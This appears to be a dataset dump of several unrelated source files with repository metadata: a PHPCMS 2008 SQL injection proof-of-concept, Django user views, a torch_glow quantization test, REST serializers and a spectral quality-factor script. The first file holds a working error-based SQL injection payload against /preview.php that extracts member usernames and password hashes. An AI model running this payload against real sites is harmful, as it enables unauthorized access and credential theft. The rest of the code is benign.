'vul_version': ['2008'],
'type': 'SQL Injection',
'tag': ['PHPCMS漏洞', 'SQL注入漏洞', '/preview.php', 'php'],
'desc': 'N/A',
'references': ['http://www.wooyun.org/bugs/wooyun-2013-022112',
],
},
}
@classmethod
def verify(cls, args):
payload = ("/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2'%20and%20(select%201%20from("
"select%20count(*),concat((select%20(select%20(select%20concat(0x7e,0x27,username,0x3a,password,"
"0x27,0x7e)%20from%20phpcms_member%20limit%200,1))%20from%20information_schema.tables%20limit%200"
",1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)--%20a")
verify_url = args['options']['target'] + payload
req = urllib2.Request(verify_url)
if args['options']['verbose']:
print '[*] Request URL: ' + verify_url
content = urllib2.urlopen(req).read()
reg = re.compile("Duplicate entry '~'(.*?)'~1' for key 'group_key'")
res = reg.findall(content)
if res:
args['success'] = True
args['poc_ret']['vul_url'] = verify_url
args['poc_ret']['Admin_pwd'] = res[0]
return args
exploit = verify
if __name__ == '__main__':
from pprint import pprint
mp = MyPoc()
pprint(mp.run()) | [
"834430486@qq.com"
] | 834430486@qq.com |
33c640404f61f1578eabdb131983ea14b43007c2 | 93a13468fd34692ca58ec5aad8f923a5097a19a5 | /users/views.py | e2150174780cec0192b483daaa9b2f09e459b8a2 | [] | no_license | Ryanden/AirBnB-Clone | 0734735a5f1e38b2670db12a4aeb81a2ccb8dc71 | a9be3a6f2cda3c11f036c5f8a31b0c972ed77905 | refs/heads/master | 2023-04-29T07:10:10.177262 | 2021-02-16T13:48:33 | 2021-02-16T13:48:33 | 232,119,018 | 0 | 0 | null | 2023-04-21T21:14:19 | 2020-01-06T14:32:18 | Python | UTF-8 | Python | false | false | 1,532 | py | from django.views import View
from django.views.generic import FormView
from django.shortcuts import render, redirect, reverse
from django.contrib.auth import authenticate, login, logout
from django.urls import reverse_lazy
from . import forms
class LoginView(View):
def get(self, request):
form = forms.LoginForm()
return render(request, "users/login.html", {"form": form})
def post(self, request):
form = forms.LoginForm(request.POST)
if form.is_valid():
email = form.cleaned_data.get("email")
password = form.cleaned_data.get("password")
user = authenticate(request, username=email, password=password)
if user is not None:
login(request, user)
return redirect(reverse("core:home"))
return render(request, "users/login.html", {"form": form})
def log_out(request):
logout(request)
return redirect(reverse("core:home"))
class SignUpView(FormView):
template_name = "users/signup.html"
form_class = forms.SignUpForm
success_url = reverse_lazy("core:home")
initial = {"first_name": "test", "last_name": "guest", "email": "test@gmail.com"}
def form_valid(self, form):
form.save()
email = form.cleaned_data.get("email")
password = form.cleaned_data.get("password")
user = authenticate(self.request, username=email, password=password)
if user is not None:
login(self.request, user)
return super().form_valid(form)
| [
"lockstom@gmail.com"
] | lockstom@gmail.com |
b53e1d637c5aada77f90884734c81edc8fe7d932 | d5bc5ad0aa9276c661adfffe0acbe8b3211b39e4 | /torch_glow/tests/functionality/quantized_cut_in_the_middle_test.py | 5b9260be64fc135f8e6585d3c9cf1b5472c2371b | [
"Apache-2.0"
] | permissive | xw285cornell/glow | b3ec6f84be6485e5b55550c97566d11512e92167 | 90b5badcf583c0cdd880d263a687ae387bcbbb72 | refs/heads/master | 2022-12-06T05:49:09.743232 | 2020-09-04T07:34:59 | 2020-09-04T07:36:17 | 292,919,567 | 0 | 0 | Apache-2.0 | 2020-09-04T18:28:14 | 2020-09-04T18:28:13 | null | UTF-8 | Python | false | false | 2,078 | py | # isort:skip_file
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch_glow
import torch
from tests.utils import GLOW_NODE_NAME
class TestQuantizedCut(unittest.TestCase):
def test_quantized_cut(self):
"""Test cut quantized chunk in the middle."""
torch._C._jit_set_profiling_executor(False)
torch._C._jit_set_profiling_mode(False)
def fun(a, b, c, d):
q = torch.nn.quantized.Quantize(
scale=1.0 / 21, zero_point=0, dtype=torch.quint8
)
dq = torch.nn.quantized.DeQuantize()
a = q(a)
b = q(b)
c = q(c)
d = q(d)
adds = torch.ops.quantized.add(a, b, scale=1.0 / 17, zero_point=5)
adds2 = torch.ops.quantized.add(c, d, scale=1.0 / 14, zero_point=4)
res = torch.ops.quantized.add_relu(
adds, adds2, scale=1.0 / 18, zero_point=6
)
res = torch.ops.quantized.add(res, res, scale=1.0 / 13, zero_point=7)
res = dq(res)
return res
with torch.no_grad():
a = torch.randn([5, 5])
b = torch.randn([5, 5])
c = torch.randn([5, 5])
d = torch.randn([5, 5])
res_torch = fun(a, b, c, d)
torch_glow.enableFusionPass()
# Cut using blacklist functionality
blacklist = ["quantized::add_relu"]
torch_glow.setFusionBlacklist(blacklist)
traced_model = torch.jit.trace(fun, (a, b, c, d))
for node in traced_model.graph_for(a, b, c, d).nodes():
kind = node.kind()
# Make sure the blacklist is working
assert (
kind == GLOW_NODE_NAME
or kind in blacklist
or kind == "prim::Constant"
)
res_glow = traced_model(a, b, c, d)
print(res_torch)
print(res_glow)
assert torch.allclose(res_torch, res_glow)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
be81e9c26fcc8071cfffa694007f998c4194f36b | 4f0a7a6942003a928037a68ac7ba6f1afb5c30c7 | /mysite/api/serializers.py | 5f3243b80ddf585f0dd9f12f458ec4edf4c4458d | [] | no_license | UPstartDeveloper/learn-django-live | 20230fb1930420bbc9c5b12a50659a9476ab830d | 94f6eea08de321b1cc41c17571cf36bdb5ee9a7e | refs/heads/master | 2023-05-06T10:18:14.990145 | 2022-04-29T15:31:15 | 2022-04-29T15:31:15 | 216,932,883 | 0 | 0 | null | 2023-04-21T20:41:16 | 2019-10-23T00:18:09 | Python | UTF-8 | Python | false | false | 319 | py | from rest_framework.serializers import ModelSerializer
from polls.models import Question, Choice
class QuestionSerializer(ModelSerializer):
class Meta:
model = Question
fields = '__all__'
class ChoiceSerializer(ModelSerializer):
class Meta:
model = Choice
fields = '__all__'
| [
"zainr7989@gmail.com"
] | zainr7989@gmail.com |
3f6b69f20b7796bfb25dcb7c59db2b97b1d8faf1 | 1ab903cf2e439919e208db6a1ea85b95fc447eb6 | /classifier_preprocessor_quality_factor.py | 041d0557ef44914a9d67d98ee552072f9081c777 | [] | no_license | shanonentropy/photonic_thermometer_intake_module | 7156e91a7e38e9f1413f1edfe6308ac773fd9613 | d3ff7b967ae6ea072bd1edc0718fe662d67b3d07 | refs/heads/main | 2023-08-25T06:26:40.189162 | 2021-10-04T18:14:38 | 2021-10-04T18:14:38 | 413,526,266 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,031 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Nov 26 10:38:27 2019
@author: zahmed
this program is part of the SENSOR_CLASSIFIER program's pre-processing routine
it will take in all the data from the sensor folder and display it
"""
import os
import pandas as pd
from sklearn.preprocessing import minmax_scale
from scipy import interpolate
from scipy.interpolate import splrep, sproot
import numpy as np
import matplotlib.pyplot as plt
#path to directory with the relevant files
path_dir = r'C:\Interpolation_Project\classification\fbg_classification'
#loop over the files and then create a list of file names to later iterate over
''' for each spectra we need to extract the following set of information
number of peaks
if more than one peak, peak-to-peak distace (ppd) and delta ppd
Q of the device
from the normalized spectra, skewness
and intensity of profile of the spectra
the first part is to just feed in data with profile and label and
see if the classifier works, if not, keep adding more features
so this program will just take in the data, fit it, create a dataset with
known pitch of 0.003 nm and output data ninmax scaled profile data with the
same name
'''
file_names = []
Q = []
cols = ['x', 'y']
for fname in os.listdir(path_dir):
file_names.append(fname)
print(fname)
file_path = (os.path.join(path_dir, fname))
df = pd.read_csv(file_path, sep = '\t', header = 4, engine = 'python', names =cols )
df.sort_values(by='x', ascending =True, inplace = True)
df.drop_duplicates( inplace =True)
# df.plot('x','y')
# m = df.x.count()
# s_val = 1/(m - np.sqrt(2*m))
tck = interpolate.splrep(df.x,df.y,s=0.0000001) # s =m-sqrt(2m) where m= #datapts and s is smoothness factor
x_ = np.arange (df.x.min(),df.x.max(), 0.003)
y_ = interpolate.splev(x_, tck, der=0)
# plt.plot(df['x'],df['y'])
# plt.scatter(x_,y_)
# plt.show()
HM =(np.max(y_)-np.min(y_))/2
w = splrep(x_, y_ - HM, k=3)
# print(sproot(w_j))
try:
if len(sproot(w))%2 == 0:
r1 , r2 = sproot(w)
# print(r1, r2)
FWHM = np.abs(r1 - r2)
# print('FWHM=',FWHM)
center_wavelength = r1 + FWHM/2
Q.append(center_wavelength/FWHM)
except (TypeError, ValueError):
print(fname,'error')
continue
df1 = pd.DataFrame(y_, x_)
# print(df1.head(3))
# df1['x_scale'] = minmax_scale(x_, feature_range=(0,1))
# df1['y_scale'] = minmax_scale(y_, feature_range=(0,1))
# plt.plot(df1['x_scale'], df1['y_scale'])
# df1.reset_index(inplace=True)
# df1.drop('index', axis=1, inplace=True)
# df2 = df1[['x_scale', 'y_scale']]
# print(df2.head(3))
# tmp = df2[['x_scale', 'y_scale']].transpose()
# tmp = pd.DataFrame(tmp.loc['y_scale'].T).T
# print(tmp)
# tmp.to_csv(fname)
df_q = pd.DataFrame({'filnames':file_names, 'quality_factor':Q})
df_q.to_csv('quality_factor')
| [
"noreply@github.com"
] | shanonentropy.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.